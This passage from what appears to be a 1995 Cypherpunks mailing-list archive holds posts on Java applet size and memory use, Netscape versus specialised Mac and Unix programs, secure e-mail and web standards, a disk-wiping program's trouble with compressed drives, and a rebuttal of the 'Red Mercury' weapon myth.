new to Tcl. -L. Futplex McCarthy "Want to put your secret files where no-one will ever be able to access them ? Try ftp://ftp.netcom.com/pub/" From anonymous-remailer at shell.portal.com Thu Jul 20 16:36:15 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 20 Jul 95 16:36:15 PDT Subject: DOVE/Red Mercury doom U.S. Super State?Red Mercury myth Message-ID: <199507202335.QAA13609@jobe.shell.portal.com> On Thu, 20 Jul 1995, Gary Jeffers wrote: > Red Mercury means Antimony Mercury Oxide. This compound > looks rather > harmless but it is not. This compound is very technically > difficult to This myth shows up on sci.chem every few months or so. There is no such thing. -Rat From hfinney at shell.portal.com Thu Jul 20 16:46:31 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 20 Jul 95 16:46:31 PDT Subject: Java (was Netscape: the big win) Message-ID: <199507202345.QAA16459@jobe.shell.portal.com> So, what would be a "cypherpunk" thing you could do with Java? I know I can use it to download little applets to my system to do animations. What can it do to enhance my privacy? What would be the Java equivalent of PGP? Hal From piff at world-net.sct.fr Thu Jul 20 17:16:47 1995 From: piff at world-net.sct.fr (piff at world-net.sct.fr) Date: Thu, 20 Jul 95 17:16:47 PDT Subject: Lotus AmiPro doc Message-ID: <199507210017.CAA23302@world-net.sct.fr> I was recommended to you by a friend who told me that you may be able to help me decrypt or suck the password out of a LotusAmiPro doc. Your help would be greatly appreciated. Please email back me as soon as you can find the time. Thank you. From cman at communities.com Thu Jul 20 17:19:01 1995 From: cman at communities.com (Douglas Barnes) Date: Thu, 20 Jul 95 17:19:01 PDT Subject: Java (was Netscape: the big win) Message-ID: >Does anyone here have any figures on how much memory Java takes up >when running its typical tasks? > These are real ball-park figures based on looking at "free memory" from vmstat from several instances of launching, running, then exiting from the listed programs: Java compiler (written in Java), compiling big program: 2.5 MB HotJava browser (written in Java), after running some applets: 4.0 MB "Hello world" Java program (no GUI): 800K From cman at communities.com Thu Jul 20 18:05:38 1995 From: cman at communities.com (Douglas Barnes) Date: Thu, 20 Jul 95 18:05:38 PDT Subject: Java (was Netscape: the big win) Message-ID: >At 05:18 PM 7/20/95 -0800, Douglas Barnes wrote: >>Java compiler (written in Java), compiling big program: 2.5 MB >>HotJava browser (written in Java), after running some applets: 4.0 MB > >Believable for this sort of thing. > >>"Hello world" Java program (no GUI): 800K >Yow! Does this mean I'd have to download an 800K applet to my browser >just to get it to say "Hello, World"? Or is this a complete standalone >program, much larger than a typical applet? Uh, no, this is a standalone Java program (includes interpreter, language library, etc.) Applets are treated by a browser in the same way that a GIF is treated (more or less); the browser may have to grab more memory to take in a big one, but that memory can be reclaimed when the user moves on to a new page. Applets run as a thread within a multi-threaded browser, they don't have their own processes, etc. From stewarts at ix.netcom.com Thu Jul 20 18:14:21 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 20 Jul 95 18:14:21 PDT Subject: Java (was Netscape: the big win) Message-ID: <199507210112.SAA01503@ix7.ix.netcom.com> At 06:04 PM 7/20/95 -0800, Douglas Barnes wrote: >Uh, no, this is a standalone Java program (includes interpreter, >language library, etc.) > >Applets are treated by a browser in the same way that a GIF is treated >(more or less); the browser may have to grab more memory to take in >a big one, but that memory can be reclaimed when the user moves on to >a new page. > >Applets run as a thread within a multi-threaded browser, they don't >have their own processes, etc. Good. Any guesses how big a basic "Hello, World" applet would be? Maybe 10K? # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From shamrock at netcom.com Thu Jul 20 18:24:10 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 20 Jul 95 18:24:10 PDT Subject: Netscape the Big Win Message-ID: <199507210121.VAA29893@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199507201631.MAA18946 at clark.net>, rjc at clark.net (Ray Cromwell) wrote: > The answer is: integration. While TRN is a great newsreader, and >Eudora's a great mail reader, etc, if I read a post in TRN or a message >in Eudora, there is no hyperlinking. If I see a link or reference, If you used a Mac, all you had to do is click on the URL in your mailer, newsreader, even some text editors, and the correct helper aplication will open the URL. For you Mac users: ftp://redback.cs.uwa.edu.au//Others/Quinn/Config/ICeTEe1.1.1.sit requires InternetConfig, which is available at all the major archive sites. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMA8BGioZzwIn1bdtAQGEEQF+PRWtaNDSdRuJYDZfGRGATwFM4zgetK7Q cLRAa8/r89fJvzz5yRJSZLrbm84B0yYs =qAXZ -----END PGP SIGNATURE----- From shamrock at netcom.com Thu Jul 20 18:40:28 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 20 Jul 95 18:40:28 PDT Subject: Netscape the Big Win Message-ID: <199507210138.VAA00100@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , tcmay at sensemedia.net (Timothy C. May) wrote: >The News reader in Netscape 1.1N is as good as the main "separate" news >reader, NewsWatcher, for the Macintosh, and has some added benefits. For >example, URLs in News postings automatically show up as clickable items, >which can be jumped to immediately. (Other News programs _could_ do this, >and maybe some of them do, but not on the Macintosh, at this moment.) I won't suggest that others change their favorite programs, but here are the facts: - -All URLs in Newswatcher can be accessed by cmd-clicking them. - -V.A. and Y.A. Newswatcher provides transparent use of anonymous remailers for both news and email. A feature that most cypherpunks will appreciate and that Netscape does not provide. - -In Macs with InternetConfig and the latest ICeTEe extension installed, all programs that use TextEdit, such as Eudora and SimpleText, become browsers that allow instant access to any URL mentioned in the text just by cmd-clicking on it. Netscape doesn't even come close. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMA8E7ioZzwIn1bdtAQFc8gGA0tBCx3neJNN6q/0JQ9dCALSKQh/+v67z kaXJOLIcpbNW6VWVI32nJwap+C5sdwPg =Ms35 -----END PGP SIGNATURE----- From shamrock at netcom.com Thu Jul 20 18:44:36 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 20 Jul 95 18:44:36 PDT Subject: Netscape the Big Win Message-ID: <199507210142.VAA00150@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , tcmay at sensemedia.net (Timothy C. May) wrote: >Frankly, one of the great boons of my current setup is that I can >completely get away from Unix tools and commands, away from my Unix shell >account at Netcom, away from the arcane commands that vary from program to >program, away from tin and elm and emacs...my fingers are already >forgetting the emacs commands! > >(Those of you like Unix, fine. I agree it is useful for many things, so I'm >not trying to debate Unix vs. the world. Just giving my perspective, and >apparently the perspective of the many who are adopting the Web browsers as >their "operating environments," insulated from the underlying cruft.) Is this the same T.C. May that used to argue vehemently that if it can't be displayed on a VT52, it was no good? Did a space alien take over Tim? - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMA8F3SoZzwIn1bdtAQHKegF9GZbdSEP4Q5LlQz6KdwapuCMS3v5i693V GoyxCoWO/iEOR6M5kl7ASgkagzJgVMi8 =n2gM -----END PGP SIGNATURE----- From tcmay at sensemedia.net Thu Jul 20 19:28:49 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 20 Jul 95 19:28:49 PDT Subject: Netscape the Big Win Message-ID: At 11:21 PM 7/20/95, Douglas Barnes wrote: >I don't get what you mean when you say, "Java isn't ready for the >home market." True, I don't think that programming languages of >any sort are part of the "home market", but I think that Java will >enable people like cypherpunks to write extremely portable applications >_once_ that will be embeddable on web pages viewed by browsers like >Netscape. I can't think of anything that is going to come closer to >your definition of "winning" the home market. Certainly the home I agree. This is what I meant by saying programmers would use it, to put these capabilities into browsers that home users then get. Maybe this is just semantic quibbling: all I meant is that Java (or Fortran, or Perl, or whatever) will not be things the home user is ready for. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From rah at shipwright.com Thu Jul 20 19:54:40 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 20 Jul 95 19:54:40 PDT Subject: Netscape the Big Win(dows) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- on Thu, 20 Jul 1995 10:39:49 -0700, tcmay at sensemedia.net (Timothy C. May) wrote: >The News reader in Netscape 1.1N is as good as the main "separate" news >reader, NewsWatcher, for the Macintosh, and has some added benefits. For >example, URLs in News postings automatically show up as clickable items, >which can be jumped to immediately. (Other News programs _could_ do this, >and maybe some of them do, but not on the Macintosh, at this moment.) Nit: The standard version of Newswatcher does this. Just hold down the command key and click on the URL. In addition, using the Internet Config extension allows you to do this in lots of other standard Mac internet apps, including the Eudora app you're using to read your mail with right now. Newswatcher, in it's enhanced "value added" versions, does filtering, and even will do a one-bounce anonymous remail off the remailer of your choice. >Big programs tend to grow because they can increase market share by adding >capabilities, by pulling in more customers. As someone who's developed and marketed apps for the Mac market, feature creep usually happens more to differentiate yourself from your competition than for any other reason. Don't look back 'cause they might be gaining on you. Frankly, it's more of a death spiral than anything else. You get design by focus group and feature list. The classic example of this in the Mac market is M$ Word, which has now became such a cow that I find myself reccommending WordPerfect (of all things) to my consulting customers. At least with Excel, there's still nothing much better, until the next generation, anyway. >And I'm not going to use half a dozen small programs, each doing slightly >different things and having different commands, when one will do nicely. Only when their feature sets overlap, like in word processors and spreadsheets. When they're fully differentiated like what happened on the Mac TCP/IP internet app market, interface fatigue is not much of a problem. >(I could list other pluses and minuses, a la my outline FAQ, but here's >just one more important item: cross-compatibility. Namely, with N smaller >programs in use, of varying versions, incompatibilities and even crashes >can result all too often ("We have discovered that MailMuncher 2.12 does >not work with NewsNabber 1.1."). At lest with something like Netscape, a >certain amound of cross-operability is likely, for various reasons.) Not as bad as it sounds. Most Mac internetware types are pretty good about fixing cross-crashes, that is until they get too big to care, which may happen with Netscape. In general, Mac stuff doesn't crash nearly as much as it used to, and not nearly as much as Window$ still does. You get more crashes in MacTCP apps because Apple botched their initial TCP implementation. They're fixing that with Open Transport, which I've seen and which is pretty bulletproof so far. Finally, we're still in the chewing-gum and-bailing-wire stage with most internet apps, and the MacTCP based apps are no exception. >In any case, while I respect the views Pat is expressing, about >componentware and "small is better" approaches, the market is voting with >its feet for apps like Netscape, which are becoming the main programs folks >will use for communication, News reading, and Web surfing. Tell us about it in 6 months, Tim, when you've grown out of Netscape. You sound like someone who's totally enamored with their "-works" app. Most people end up using more specialized apps when they hit the wall with something which won't get all those "general purposes" taken care of... >So go ahead and do it! I've been waiting for many years for such things. Soon. Very soon, Tim. There's talk on the mcip (Macintosh Crytography Interface Project) list about version 3.0 of MacPGP which should be completely modular, and should not require a shell-PGP session to work. Until then, the applescript hacks seem to be holding up, though Mr. 'corn's tribulations make a brilliant counterexample. My signature below was done with them... > >To state an obvious non-crypto use of such "modules," why do all major word >processing and page layout apps have their own "dictionaries"? Why do I >have to train the dictionaries of Word, Nisus, FrameMaker, MORE, etc.? That >there have not been "dictionary modules," for many and sundry reasons, is >telling. Claris started to do this, but nobody wanted to standardize on their stuff for obvious reasons (they're owned by Apple)... >(Before anyone mentions it, one can on the Mac use things like >"Thunder" instead of the local dictionaries...this is not the same as a >module usable by all programs, but instead is a user choice to bypass the >local dictionaries. We could quibble for hours about whether this is in >fact a universal module or not. Indeed, though we shouldn't. Because it is. Anyway, you're talking apples and oranges here. A crypto module like we're talking about would function more as an init, er, sorry, an extension, rather than as a separate app, though Stuffit makes a good example of something which works pretty well as both. Cheers, Bob Hettinga -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMA8WFvgyLN8bw6ZVAQE0agP9FVBNe7lPu8dsqd3tNmGAMY7ivIX0eDR4 uHcogdALmk8+p8eN/a4xpfaAu2uuNp9m/FqTbUC466XREyRI7UVqOZ5EXU8UNEDZ ykkEaqxIWZ42SZpgHgdCaMdLeNWE8Y5T1ekhN1FjmnoU2oNOQpjH1sbqs1TDuuBo jWaTC4slnxU= =MnuL -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From cman at communities.com Thu Jul 20 19:57:03 1995 From: cman at communities.com (Douglas Barnes) Date: Thu, 20 Jul 95 19:57:03 PDT Subject: Java (was Netscape: the big win) Message-ID: >Good. Any guesses how big a basic "Hello, World" applet would be? >Maybe 10K? The "Hello World" program I mentioned before is 325 bytes after compilation. The 800K memory usage was a measurement of the interpreter and language libraries being sucked into memory, assuming no other activity on the machine. I have a much larger program that does various kinds of reformatting and munging of Java programs that take up a whopping 8K compiled, its source file is 13K. The bytecode compiled programs seem to be much more compact than their source code versions. From ethridge at Onramp.NET Thu Jul 20 20:42:12 1995 From: ethridge at Onramp.NET (Allen B. Ethridge) Date: Thu, 20 Jul 95 20:42:12 PDT Subject: Netscape the Big Win Message-ID: TCMay: > >Why is this important? > >I believe, quite strongly, that we are headed toward a situation where the >large majority of Net/Web users are using some variant of Netscape, or >Mosaic/MacWeb/etc. (but probably Netscape, for various reasons). > >Integration of crypto into Netscape is thus the Big Win. > >I felt this was the case as far back as last fall, but my recent >experiences tell me this is more important than ever. Integration of PGP >and other crypto routines into Tin, Pine, Elm, Joe, Emacs, etc., is just >not as important. > >... > >(I'm not saying one has to stand in line for the August IPO of Netscape >Communications, but the overall market will favor the Web browsers, >especially Netscape.) > >The relevance for Cypherpunks interested in writing code is that, in my >carefully considered opinion, writing for Netscape and other Web browsers >is the Big Win. Even over Windows (except Windows browsers, of course). > >--Tim May I only have time to keep up with my mailing lists on the weekend, so these may have been mentioned, but... Didn't Netscape get the short end of a major banking alliance recently? And wasn't Microsoft's network and security software favored by that? Has anyone here messed about with PDAs/PICs? The Apple Newton doesn't have much in the way of communication, but MagicCap based boxes such as Sony's Magic Link have an awful lot of (as yet unrealized) potential. I see as much promise/threat for communications security in the newer PDA/PIC devices as in Netscape. But then i also want Netscape to invoke Eudora for mail and Newswatcher for news, rather than having to use the as yet unstable Netscape tools. allen From hal9001 at panix.com Thu Jul 20 20:46:22 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Thu, 20 Jul 95 20:46:22 PDT Subject: Netscape the Big Win Message-ID: At 10:39 7/20/95, Timothy C. May wrote: >To state an obvious non-crypto use of such "modules," why do all major word >processing and page layout apps have their own "dictionaries"? Why do I >have to train the dictionaries of Word, Nisus, FrameMaker, MORE, etc.? That >there have not been "dictionary modules," for many and sundry reasons, is >telling. (Before anyone mentions it, one can on the Mac use things like >"Thunder" instead of the local dictionaries...this is not the same as a >module usable by all programs, but instead is a user choice to bypass the >local dictionaries. We could quibble for hours about whether this is in >fact a universal module or not. Since the support that Thunder 7 provides (with Wordprocessing and Wordprocessing-Like Programs that it supports) is indistinguishable from that provided by each program's integrated SpellChecker (along with T7 providing a common set of "extra" User-Extendable Dictionaries as well as a Glossary/Mis-Spelling/Words-to-Replace Dictionary [ie: Pre-Prime the list of incorrectly spelled words for "Replace All" so the user's personal misspellings are automatically corrected without any interaction on his/her part]), I think the ball is initially in the court of those who claim it is not a universal module (admittedly only for those WPs it supports) to explain why is does not function as one would function if it existed. IMHO - T7 is walking and quacking like a Duck so I think calling it a "Duck" (as a first approximation) is not an unjustified action . From gjeffers at socketis.net Thu Jul 20 21:07:15 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Thu, 20 Jul 95 21:07:15 PDT Subject: Superwipe Message-ID: <199507210601.BAA25559@mail.socketis.net> Dear Cypherpunks, This is mostly an old post that Monty Harder sent me concerning my program Superwipe. I got his ok to post it to Cypherpunks so that it would stimulate debate on my program. In addition to the original problem of wiping compressed sectors, I have found a second problem: with cacheing software and the now ubiquitous several hundred k hardware ram caches, it is about impossi- ble to do multiple wipes on sectors. Anyone else got any ideas? GJ> A number of problems have cropped up though. It will not handle GJ> compressed disks yet. SUPERWIPE writes all 0's or all 1's & you know GJ> what a compressed disk driver will do with them. The driver would > Since most hard drives use a form of RLL encoding at the hardware >level, the bits don't all go in the same places every time. For maximum >security, you would need to write 00h through FFh, but a fair compromise >would be five passes: 00,55,AA,FF, and finally the string > 'SUPERWIPEd for your protection.',BEL,CR,LF >(gotta get in that plug) followed by random garbage. GJ> crush them down to a few bytes at the beginning of the file & the rest GJ> of the file would not be touched. GJ> GJ> I have decided that I can solve that problem by writing a random GJ> number generator function and filling the file with non- compressable GJ> random numbers. > Nope. Won't work. Suppose FUBAR.DAT is currently compressed at 7:16 >(DoubleSpace, Stacker, et.al. typically use 16 sectors per cluster). >When the request to write the random cluster, now noncompressible, comes >along, the driver will find =another= run of 16 contiguous sectors to >hold the data, and free the old one (DS has no choice about this, but >Stacker can split clusters into noncontiguous areas if necessary. I >believe it "prefers" contiguous blocks, however. IANASU.) > Your best bet is to put right in your docs a warning that compressed >drives make reliable operation of SUPERWIPE impossible to assure, and >that sensitive data are best kept on uncompressed drives. GJ> Also, I am thinking of putting SUPERWIPE into the public domain. GJ> I would use the privacy functions presently in it and also include a GJ> few more privacy functions. If I put it into the public domain, then GJ> I will have to distribute source code. This could make me more vunerable > Why? Distribute executables, assert your copyright, and include a >GNU-type freeware license or whatever your heart desires. That would be >the international release. If you want, put up your source code with the >usual export controls, separately. From carolab at censored.org Thu Jul 20 21:56:21 1995 From: carolab at censored.org (Censored Girls Anonymous) Date: Thu, 20 Jul 95 21:56:21 PDT Subject: And another thing... In-Reply-To: <199507202233.AA15359@tyrell.net> Message-ID: >From the tiny marketer level, its because it will spell the death of Ticketmaster. We can show you where your seat is in the stadia or arena. We can then sell you the ticket on a secure socket. And then let you print the ticket on your own printer. The economics of this are fantastic. Love Always, Carol Anne On Thu, 20 Jul 1995, Phil Fraering asked with insight: > Why is Java the next hot thing instead of Telescript? > Member Internet Society - Certified BETSI Programmer - WWW Page Creation ------------------------------------------------------------------------- Carol Anne Braddock <--now running linux 1.0.9 for your pleasure carolann at censored.org __ __ ____ ___ ___ ____ carolab at primenet.com /__)/__) / / / / /_ /\ / /_ / carolb at spring.com / / \ / / / / /__ / \/ /___ / ------------------------------------------------------------------------- A great place to start My Cyber Doc... From hal9001 at panix.com Fri Jul 21 01:02:16 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Fri, 21 Jul 95 01:02:16 PDT Subject: It had to happen... Message-ID: At 15:41 7/20/95, Douglas Barnes wrote: >Has anyone caught this yet? From "No Such Agency" to having >their own Web page... wow. > >http://www.nsa.gov:8080/ They've been on the net for years. They were dockmaster (I do not remember the domain) and were mentioned as such in Cuckoo's Egg. The address is probably being run by the same section as dockmaster is/was (RTM Sr's Group). From perry at imsi.com Fri Jul 21 01:16:58 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 21 Jul 95 01:16:58 PDT Subject: S/MIME and the Future of Netscape In-Reply-To: Message-ID: <9507210816.AA18815@snark.imsi.com> > With regard to SSL and Netscape not being open to outside developers, > several leading e-mail outfits, including Qualcomm, Netscape, Frontier, > etc., are working on an interoperable secure e-mail standard called > "Secure/MIME," or "S/MIME." Huh? Don't know about MOSS? Its now hit Proposed Standard.... .pm From bailey at computek.net Fri Jul 21 01:29:23 1995 From: bailey at computek.net (Mike Bailey) Date: Fri, 21 Jul 95 01:29:23 PDT Subject: Java (was Netscape: the big win) (fwd) Message-ID: On Thu, 20 Jul 1995, Bill Stewart wrote: > At 06:04 PM 7/20/95 -0800, Douglas Barnes wrote: > >Uh, no, this is a standalone Java program (includes interpreter, > >language library, etc.) > > > >Applets are treated by a browser in the same way that a GIF is treated > >(more or less); the browser may have to grab more memory to take in > >a big one, but that memory can be reclaimed when the user moves on to > >a new page. > > > >Applets run as a thread within a multi-threaded browser, they don't > >have their own processes, etc. > > Good. Any guesses how big a basic "Hello, World" applet would be? > Maybe 10K? > # Thanks; Bill > # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com While true certain small programs may be larger in size; the difference will decrease as the programs grow in complexity. With the natural stong point of true object oriented code reusing more code as the program grows the difference may still measurably be there but will be hardly noticeable. it is the future of the net I see this being the last step that get's coporations on the net ... making money in a *relativly* secure way ... good or bad is another thread which I don't want to be a part of. -Mike ************************************************************************** * * * Mike Bailey (hm)214-252-3915 * * AT&T Capital Corporation. (wk)214-456-4510 * * email bailey at computek.net host bambam.computek.net * * * * "Remember you can tune a piano but you can't tuna fish -Joe Walsh" * * http://www.computek.net/public/bailey/ * ************************************************************************** From perry at imsi.com Fri Jul 21 01:40:45 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 21 Jul 95 01:40:45 PDT Subject: Netscape the Big Win In-Reply-To: Message-ID: <9507210840.AA22286@snark.imsi.com> Timothy C. May writes: > I am sorry that some folks heavily committed to the Linux route, or to > Emacs, or to GNU/FSF, or to other approaches feel that their work is > technically superior and deserves to be as popular as Netscape and simiar > approaches, but reality is reality. I assume everyone but Tim knows about Netscape's origins in Mosaic, and understands thus why his comments above are so amusing. Perry From ekr at eit.COM Fri Jul 21 01:44:23 1995 From: ekr at eit.COM (Eric Rescorla) Date: Fri, 21 Jul 95 01:44:23 PDT Subject: Netscape the Big Win Message-ID: <9507210844.AA17250@eitech.eit.com> Hal Finney writes: >From: Adam Shostack >> Actually, it also supports Kerberos (not relevant to most of >> us), and PGP messaging. Although a KCA would be needed before anything >> useful came of the PGP support, at least its there. > >It appears that support for PGP messaging has been removed from the >July 1995 SHTTP draft. So it's X.500 all the way. > Well, X.509 for now. The Eastlake-Kaufman DNS Security work (draft-ietf-dnssec-secext-04.txt) plus MOSS (draft-ietf-pem-mime-08.txt --now proposed standard, awaiting an RFC number) promise to give us a non-X.509 certification structure for the Internet. S-HTTP explicitly looks to this work to free us from X.500. Note that this only marginally improves the situation, however, since what you really want is commercial-grade certification, and you still can't issue RSA certificates, whatever the format, without licensing from RSADSI. This promises to be something of an issue in the future. -Ekr From perry at imsi.com Fri Jul 21 02:19:30 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 21 Jul 95 02:19:30 PDT Subject: DOVE/Red Mercury doom U.S. Super State? In-Reply-To: <199507202345.SAA24056@mail.socketis.net> Message-ID: <9507210919.AA27922@snark.imsi.com> The Wall Street Journal had a fascinating article on the scams about "Red Mercury" in the former soviet union -- suffice it to say the whole thing is bogus. .pm Gary Jeffers writes: > DOVE/Red Mercury dooms U.S Super State? =20 > > The first part of this post deals with Red Mercury. The > remainder > deals generally with cheap weapons of mass destruction and From perry at imsi.com Fri Jul 21 02:31:56 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 21 Jul 95 02:31:56 PDT Subject: It had to happen... In-Reply-To: Message-ID: <9507210931.AA29736@snark.imsi.com> Douglas Barnes writes: > Has anyone caught this yet? From "No Such Agency" to having > their own Web page... wow. They also have a Fortezza based web security system. One of their guys was discussing some of that here at IETF. Perry From perry at imsi.com Fri Jul 21 02:36:53 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 21 Jul 95 02:36:53 PDT Subject: Netscape the Big Win In-Reply-To: Message-ID: <9507210836.AA21665@snark.imsi.com> Timothy C. May writes: > one way or the other, and will join the rest of the world (apparently) in > using Netscape. This from "Mr. Ascii" as of six months ago. Everyone remember when Tim was flaming MIME and the rest? Well, Netscape was out back then, too. > And yes, I am "marginalizing" the work that anyone does on "fringe" > projects like Linux, which will likely always remain in the ghetto > of Unix hackers who want a cheap Unix running on their cheap 486 > boxes...it just ain't gonna take over inside corporations or amongst > the many folks like me. I apologise for doing my IPSP work on a marginal operating system like BSD Unix. Were I a truly non-marginalized person, I'd have realized that Novell Netware and Appletalk were the internetworking technologies of the future. I would suggest that you get rid of your web browser while you can -- it was descended from code written for Unix, that marginalized operating system. By the way, I understand Netscape does their development with marginalized machines. > That Qualcomm (Eudora), Netscape, Frontier, Microsoft, Lotus, and others > are working on an interoperable "Secure/MIME" should be encouraging. I'm glad to see you've not been paying attention to the IETF work on MOSS. After all, we are a marginalized group -- we only built the Internet, you know. Perry, writing from the marginalized IETF meeting in Stockholm, where the nowhere people define standards no one uses. From perry at imsi.com Fri Jul 21 03:00:40 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 21 Jul 95 03:00:40 PDT Subject: "Cypherpunks Write Code" as a Putdown In-Reply-To: Message-ID: <9507210900.AA25179@snark.imsi.com> Timothy C. May writes: > In my posting on why I think Netscape and related operating environments > represent the likeliest targets for widespread crypto use (the "big win" I > used in my title), I did not whine that others ought to write code for me. > I said that this is where users were going in massive numbers. > > Take it or leave it, as an analysis, but the "try writing some code" is a > meaningless insult. Some of us have spent the last several days not getting sleep and going to meetings here in Stockholm -- defining security standards, talking to Microsoft people about IPSP integration into Win '95 and Windows NT, recruiting people to work on the project we have to make sure that the IETF meeting in Dallas in a few months will have IPSP security. We hope to have the whole infrastructure of the internet encrypted within a year or two. I believe that between IPSP for the links and MOSS (and SHTTP using MOSS for document security) we should have the whole thing wrapped up in a couple of years. Problems still to solve include security for the internet's routing protocols, protection against denial of service attacks, etc. Remailers and the like are still worthwhile areas for effort, of course, but I think of those of applications of the secure infrastructure. Those people who would rather work than talk are invited to start reading the internet drafts (some of which are soon to be RFCs) and help out with the effort. I suspect that a big push from about 25 people could manage to implment just about everything we want and then we could go on and live the rest of our lives. There is a lot of real hard work to do in the next year or two and I invite members of the community to quit waiting for the CryptoRapture in which the X-Ists bring down the cypher systems of the future, and help us actually do the job so that we'll see this stuff in our lifetime. Perry From pgf at tyrell.net Fri Jul 21 05:09:18 1995 From: pgf at tyrell.net (Phil Fraering) Date: Fri, 21 Jul 95 05:09:18 PDT Subject: Netscape the Big Win(dows) In-Reply-To: Message-ID: <199507211204.AA19453@tyrell.net> Tell us about it in 6 months, Tim, when you've grown out of Netscape. You sound like someone who's totally enamored with their "-works" app. Most people end up using more specialized apps when they hit the wall with something which won't get all those "general purposes" taken care of... While I understand what Tim's been saying about integrated apps, since my Dad continues to use Microsoft Works instead of Wordperfect which is much better, my Dad is limiting himself in ways that ultimately Tim isn't going to accept. Remember, he also raved about the Newton for the first couple of months. I wonder if he's replaced the one he sold yet. Phil From pgf at tyrell.net Fri Jul 21 05:23:04 1995 From: pgf at tyrell.net (Phil Fraering) Date: Fri, 21 Jul 95 05:23:04 PDT Subject: The OS wars and DOOM... Message-ID: <199507211218.AA20295@tyrell.net> This is a point I want to bring up regarding the current OS war being waged on this group. Apps have migrated from Unix to the Mac and the PC before in the past. In the further past, this has included curses and other-types-of-text-control packages such as PC versions of Emacs and nethack and the like. Of course, this was not done with graphical programs; everyone knows that graphics isn't Unix's strong suit, and what it has is so different from the PC, etc., blah, blah,... Except that for the past two or three years, it's been WRONG. One of the hottest games on the PC, DOOM, was originally written in Nextstep (a Unix variant, and a ghetto even amidst the "ghetto" of Unix) and then ported to the PC. I don't know which Unix environment they're using in the "master" development effort before porting to other environments today. Given that games usually program close to the hardware, and are therefore the _most_ difficult things to port from one environment to another, it really makes one wonder why Excel isn't out for (for example) Linux or BSD today. Then again, SCO WordPerfect is... Phil From trei Fri Jul 21 05:43:46 1995 From: trei (Peter Trei) Date: Fri, 21 Jul 95 05:43:46 PDT Subject: DOVE/Red Mercury doom U.S. Super State? Message-ID: <9507211243.AA25591@toad.com> > DOVE/Red Mercury dooms U.S Super State? =20 UNALTERED Desemination of This Important Information is ENCOURAGED :-> (or words to that effect - anyone have the canonical form available?) >& Finally: In the old Feudal days, wars weren't so bad. The >nobility would fight while the peasants watched nearby & >cheered the sport. If this is an example of the depth of your research, then we certainly don't have to worry about anything else in your post. The peasants were economic assets, and their destruction was regarded as a standard practice of war. Try reading Barbara Tuchman's 'A Distant Mirror: The Calamitous 14th century.' [I must admit, however, that the idea of Bush and Sadaam Hussein having it out has a certain appeal - battleaxes in a blacked out cellar sounds appropriate.] Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation trei at process.com From enzo at ima.net Fri Jul 21 05:48:05 1995 From: enzo at ima.net (Enzo Michelangeli) Date: Fri, 21 Jul 95 05:48:05 PDT Subject: Netscape the Big Win In-Reply-To: <199507201453.HAA19510@jobe.shell.portal.com> Message-ID: On Thu, 20 Jul 1995, Hal wrote: > Note though that neither SSL or SHTTP requires that the certificates come > from RSA. However the current versions of Netscape's browser do require this. > This has been the source of much complaint and Netscape has promised that > they will have some mechanism in the future to allow the user to > choose his certificate signers. I am not sure how far RSA will let them > off the leash, though. We may bypass them altogether (see below). > Back to Perry: > > >Netscape is a closed system. You can't write code for it unless you > >work for Netscape. > > That is why I am working on the proxy approach. Any browser should be > able to use enhancements supplied in this way. Netscape is the big name > this year, who knows who it will be next year. As long as IP > connectivity is available a proxy can get into the stream and apply > enhancements. I still maintain that an approach based on SOCKS would be more flexible, adaptable to any TCP-based application. Here's what I'm thinking about: 1. Windows apps: a general purpose socksifier, intercepting Winsock API calls by *unmodified* applications and opening a single TCP connection to the port 1080 of a sockd server. The good news is: some good folks at NEC are already working at this project, and are looking for beta-testers. 2. A "SOCKS en/decrypting relay": a sockd server that, on a per-site/per-port basis depending on a configuration file, may either a) open TCP connections on behalf of its clients; b) relay a plain SOCKS connection to a remote peer; c) open a SSL connection to a remote peer on, say, a port 1180 reserved for "SSL-ized SOCKS" connections) Of course, that beast should also listen at the 